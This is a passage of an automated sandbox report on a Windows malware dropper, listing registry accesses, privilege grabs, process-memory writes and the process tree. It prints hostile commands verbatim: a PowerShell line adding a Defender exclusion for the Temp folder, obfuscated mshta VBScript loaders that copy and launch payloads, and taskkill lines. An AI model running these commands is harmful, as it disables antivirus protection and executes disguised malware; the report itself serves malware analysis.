Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri209f6924af86d795.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri209d5bfbb2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ba391d4469.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20d5530575e8aa3ed.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-J68AC.tmp\Fri20d5530575e8aa3ed.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\09xU.exE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20fbc038b0b02ea.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20d5530575e8aa3ed.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20c0c46650eeb2a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20fbc038b0b02ea.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-5867F.tmp\Fri20d5530575e8aa3ed.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2050293ea5.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2050293ea5.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2050293ea5.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20e095683c2b3a0c.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2002ce5f91c761.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2328 wrote to memory of 4160 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe
PID 2328 wrote to memory of 4160 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe
PID 2328 wrote to memory of 4160 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe
PID 4160 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 464 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 464 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 464 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 4772 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 4772 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 4772 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3264 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3264 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3264 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2408 wrote to memory of 2956 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20e095683c2b3a0c.exe
PID 2408 wrote to memory of 2956 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20e095683c2b3a0c.exe
PID 2592 wrote to memory of 4312 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
PID 2592 wrote to memory of 4312 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
PID 2592 wrote to memory of 4312 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
PID 1372 wrote to memory of 628 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20109b9e174d0fc.exe
PID 1372 wrote to memory of 628 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20109b9e174d0fc.exe
PID 1372 wrote to memory of 628 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20109b9e174d0fc.exe
PID 1220 wrote to memory of 4168 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri209f6924af86d795.exe
PID 1220 wrote to memory of 4168 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri209f6924af86d795.exe
PID 1220 wrote to memory of 4168 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri209f6924af86d795.exe
PID 3132 wrote to memory of 1392 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ee0a6fe195bd09.exe
PID 3132 wrote to memory of 1392 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ee0a6fe195bd09.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20109b9e174d0fc.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20ee0a6fe195bd09.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri200ae385720d3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri2050293ea5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri209f6924af86d795.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20ba391d4469.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20d5530575e8aa3ed.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri2002ce5f91c761.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20c0c46650eeb2a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri209c4b463b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri208f5f140853548.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20fbc038b0b02ea.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20e095683c2b3a0c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri209d5bfbb2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri2060ea1c5d8fae8aa.exe

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20e095683c2b3a0c.exe

Fri20e095683c2b3a0c.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20fbc038b0b02ea.exe

Fri20fbc038b0b02ea.exe

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20109b9e174d0fc.exe

Fri20109b9e174d0fc.exe

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri209f6924af86d795.exe

Fri209f6924af86d795.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ee0a6fe195bd09.exe

Fri20ee0a6fe195bd09.exe

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri209d5bfbb2.exe

Fri209d5bfbb2.exe

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20c0c46650eeb2a.exe

Fri20c0c46650eeb2a.exe

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20d5530575e8aa3ed.exe

Fri20d5530575e8aa3ed.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4160 -ip 4160

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe

Fri2060ea1c5d8fae8aa.exe

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ba391d4469.exe

Fri20ba391d4469.exe

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2002ce5f91c761.exe

Fri2002ce5f91c761.exe

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2050293ea5.exe

Fri2050293ea5.exe

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri200ae385720d3.exe

Fri200ae385720d3.exe

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri208f5f140853548.exe

Fri208f5f140853548.exe

C:\Users\Admin\AppData\Local\Temp\is-J68AC.tmp\Fri20d5530575e8aa3ed.tmp

"C:\Users\Admin\AppData\Local\Temp\is-J68AC.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$5024C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20d5530575e8aa3ed.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 612

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20fbc038b0b02ea.exe

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20fbc038b0b02ea.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri208f5f140853548.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri208f5f140853548.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCript: CLose ( CrEAteOBjeCT ( "wsCrIPt.SHell"). RUN ( "CmD /Q /c TYPe ""C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ba391d4469.exe"" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF """" == """" for %A iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ba391d4469.exe"" ) do taskkill /f /IM ""%~NxA"" " , 0 , true ) )

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20d5530575e8aa3ed.exe

"C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20d5530575e8aa3ed.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-5867F.tmp\Fri20d5530575e8aa3ed.tmp

"C:\Users\Admin\AppData\Local\Temp\is-5867F.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$301D6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20d5530575e8aa3ed.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri208f5f140853548.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri208f5f140853548.exe" ) do taskkill /F -Im "%~NxU"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4168 -ip 4168

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /c TYPe "C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ba391d4469.exe" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF "" == "" for %A iN ( "C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ba391d4469.exe" ) do taskkill /f /IM "%~NxA"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4980 -ip 4980

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 360

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4168 -s 620

C:\Users\Admin\AppData\Local\Temp\09xU.exE

09xU.EXE -pPtzyIkqLZoCarb5ew

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4168 -ip 4168

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )

C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe

EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3

C:\Windows\SysWOW64\WerFault.exe

